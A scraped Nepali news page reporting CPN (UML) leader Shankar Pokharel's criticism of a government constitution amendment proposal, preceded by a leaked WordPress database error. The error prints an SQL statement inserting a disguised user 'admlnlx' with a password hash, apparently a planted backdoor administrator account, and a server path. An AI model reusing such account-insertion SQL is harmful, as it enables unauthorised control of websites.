WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKknSjOG6sMLX4vty81Tx3zE2OjAUv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 18:56:17', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
संविधान कार्यान्वयन गर्नुको साटो संशोधन प्रस्तावःपोखरेल – Gaule Khabar

संविधान कार्यान्वयन गर्नुको साटो संशोधन प्रस्तावःपोखरेल

संविधान कार्यान्वयन गर्नुको साटो संशोधन प्रस्तावःपोखरेल

बुटवल, पुस २८ –

नेकपा (एमाले) स्थायी कमिटी सदस्य शङ्कर पोखरेलले निर्वाचन घोषणा गर्नु र संविधान कार्यान्वयन गर्नुको साटो सरकारले संविधान संशोधन प्रस्ताव ल्याएको आरोप लगाउनुभएको छ ।

संविधान कार्यान्वयन गराउने दायित्व पूरा गराउनुको साटो संशोधन प्रस्ताव ल्याएर सरकारले विवाद बढाएको छ भन्दै उहाँले जबरजस्ती ल्याएको संशोधन प्रस्तावलाई संसद्मा सही बाटोबाट छलफल हुन र पारित हुन नदिनेसमेत स्पष्ट पार्नुुभयो ।

प्रेस चौतारी रुपन्देहीले आज बुटवलमा आयोजना गरेको पत्रकार भेटघाटमा सत्तारुढ दलले संविधान सर्वस्वीकार्यका नाममा संविधान संशोधनबाट १० प्रतिशतलाई रिझाउने र ३३ प्रतिशतलाई अलग्याउने काम गरेको छ भन्दै नेता पोखरेलले भन्नुभयो– संविधान संशोधन प्रस्ताव नेपाल, नेपाली जनता र मधेसी समुदायको समेत हितविरुद्ध रहेकाले यसलाई असफल बनाउनेमा नेकपा (एमाले) को स्पष्ट अडानमा छ भन्नुभयो ।

सत्तारुढ दलले विभिन्न बहानामा विवादका विषय आफैँ सिर्जना गरेर निर्वाचन नगराउने र संविधानसमेत कार्यान्वयन नगर्ने उद्देश्यले सरकार लागेको आरोप लगाउँदै उहाँले जनताको चाहना विपरीत प्रदेश नं ५ लाई विभाजन गरेर पहाड र तराईलाई अलग गर्ने प्रयास गलत भएको आरोप पनि लागाउनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका